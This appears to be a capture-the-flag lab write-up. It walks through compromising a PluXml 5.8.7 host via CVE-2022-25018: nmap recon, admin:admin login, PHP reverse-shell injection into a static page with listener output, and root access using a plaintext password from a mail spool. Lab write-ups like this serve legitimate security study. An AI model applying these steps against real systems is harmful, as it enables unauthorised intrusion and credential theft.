Machine Info

Spoiler
This lab demonstrates exploiting a Remote Code Execution (RCE) vulnerability in PluXml v5.8.7 (CVE-2022-25018) by injecting a malicious PHP payload into a static page. Privilege escalation is achieved by discovering root credentials in the mail directory, enabling direct root access. This lab highlights weak web protections, file upload vulnerabilities, and privilege escalation through credential disclosure.

User

Reconnaissance

We are going to start by running our nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

ports=$(nmap -p- --min-rate=1000 -T4 $VICTIM | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

Running second nmap scan with open ports: 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-12 19:00 CET
Nmap scan report for $VICTIM
Host is up (0.029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: PluXml - Blog or CMS, XML powered !
|_http-server-header: Apache/2.4.56 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PluXml CMS

We see the CMS. Let’s do a but of enumeration before looking it up online for exploits. We find it’s admin page from the footer and we are going to login with “default creds”.

Admin creds
admin:admin

Logged in as admin we can see the version of the CMS, PluXml 5.8.7. Looking it up online we find CVE-2022-25018. A public exploit exists and instruction on how to exploit it manually. We are gonna do that. The exploit works by:

  1. Login as Admin
  2. In the Admin menu select static page and edit one
  3. Insert the PHP code there with the relevant tags <?php ?>
  4. Save changes and view the page for the code to execute

We are going to use the PHP reverse shell payload from Ivan Sincek found on Revshells

Tip
For the listener we are going to use penelope a really cool reverse listener with some extra stuff and automation like auto upgrading to a PTY when the callback comes.

After visiting the static page we get our callback.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

└─$ penelope -i tun0 -p 4444
[+] Listening for reverse shells on $ATTACKER:4444 
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from plum~$VICTIM-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /home/kali/.penelope/sessions/plum~$VICTIM-Linux-x86_64/2026_03_12-19_19_11-210.log 📜                                                                             
─────────────────────────────────────────────────────────────────────────────────────────────
www-data@plum:/var/www/html$ 
www-data@plum:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
...
www-data@plum:/$ cd /var/www
www-data@plum:/var/www$ ls -al
total 16
drwxr-xr-x  3 root     root     4096 Aug 25  2023 .
drwxr-xr-x 12 root     root     4096 Aug 25  2023 ..
drwxr-xr-x  8 www-data www-data 4096 Aug 25  2023 html
-rw-r--r--  1 www-data www-data   33 Mar 12 13:58 local.txt

That is how we get a shell and we can get the local.txt.

Root

Mail

We had linpeas run as usual but also from our own enumeration we see that there is an SMTP service running on port 25.

1
2
3
4

ss -tlnp
State       Recv-Q      Send-Q           Local Address:Port           Peer Address:Port      Process                                                                                      
LISTEN      0           128                    0.0.0.0:22                  0.0.0.0:*          users:(("sshd",pid=569,fd=3))                                                               
LISTEN      0           20                   127.0.0.1:25                  0.0.0.0:*

We are going to look on the interesting mail folders found for www-data user.

1
2
3
4
5
6

www-data@plum:/tmp$ cd /var/mail
www-data@plum:/var/mail$ ls -al
total 16
drwxrwsr-x  2 root     mail 4096 Mar 12 14:42 .
drwxr-xr-x 12 root     root 4096 Aug 25  2023 ..
-rw-rw----  1 www-data mail 4563 Mar 12 14:42 www-data

Reading up the mail we find hardcoded the root password!

Root's password
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

www-data@plum:/var/mail$ cat www-data 
From root@localhost Fri Aug 25 06:31:47 2023
Return-path: <root@localhost>
Envelope-to: www-data@localhost
Delivery-date: Fri, 25 Aug 2023 06:31:47 -0400
Received: from root by localhost with local (Exim 4.94.2)
        (envelope-from <root@localhost>)
        id 1qZU6V-0000El-Pw
        for www-data@localhost; Fri, 25 Aug 2023 06:31:47 -0400
To: www-data@localhost
From: root@localhost
Subject: URGENT - DDOS ATTACK"
Reply-to: root@localhost
Message-Id: <E1qZU6V-0000El-Pw@localhost>
Date: Fri, 25 Aug 2023 06:31:47 -0400

We are under attack. We've been targeted by an extremely complicated and sophisicated DDOS attack. I trust your skills. Please save us from this. Here are the credentials for the root user:  
root:6s8kaZZNaZZYBMfh2YEW
Thanks,
Administrator

This is how we get root.